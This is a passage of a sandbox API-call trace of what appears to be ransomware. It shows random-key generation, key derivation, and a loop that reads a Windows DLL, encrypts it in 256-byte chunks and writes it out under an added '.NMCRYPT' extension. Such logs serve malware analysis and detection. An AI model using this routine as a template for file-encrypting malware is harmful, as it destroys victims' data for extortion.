pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.352] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.353] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.353] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.353] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.353] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.353] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.353] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.353] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.353] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.353] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.353] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.353] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.353] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.353] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.353] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.353] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.353] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.353] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.353] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0148.353] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0148.354] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0148.354] CryptHashData (hHash=0x9ad5b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0148.354] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad5b8, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad7b8) returned 1 [0148.354] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0148.354] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0148.354] wcslen (_String="\\\\?\\") returned 0x4 [0148.354] CryptDuplicateKey (in: hKey=0x9ad7b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad438) returned 1 [0148.354] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0148.354] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0148.354] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8704) returned 1 [0148.354] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0148.355] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.356] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.356] GetLastError () returned 0x0 [0148.356] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.357] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.358] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.358] GetLastError () returned 0x0 [0148.358] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.358] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.358] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.358] GetLastError () returned 0x0 [0148.358] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.358] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.358] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.358] GetLastError () returned 0x0 [0148.358] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.358] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.358] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.358] GetLastError () returned 0x0 [0148.358] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.358] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.358] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.358] GetLastError () returned 0x0 [0148.358] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.358] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.358] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.358] GetLastError () returned 0x0 [0148.358] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.358] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.359] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.359] GetLastError () returned 0x0 [0148.359] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.359] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.359] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.359] GetLastError () returned 0x0 [0148.359] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.359] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.359] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.359] GetLastError () returned 0x0 [0148.359] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.359] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.359] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.359] GetLastError () returned 0x0 [0148.359] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.359] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.359] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.360] GetLastError () returned 0x0 [0148.360] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.360] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.360] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.360] GetLastError () returned 0x0 [0148.360] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.360] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.360] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.360] GetLastError () returned 0x0 [0148.360] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.360] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.360] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.360] GetLastError () returned 0x0 [0148.360] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.360] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.360] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.360] GetLastError () returned 0x0 [0148.360] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.360] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.360] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.360] GetLastError () returned 0x0 [0148.360] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.361] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, 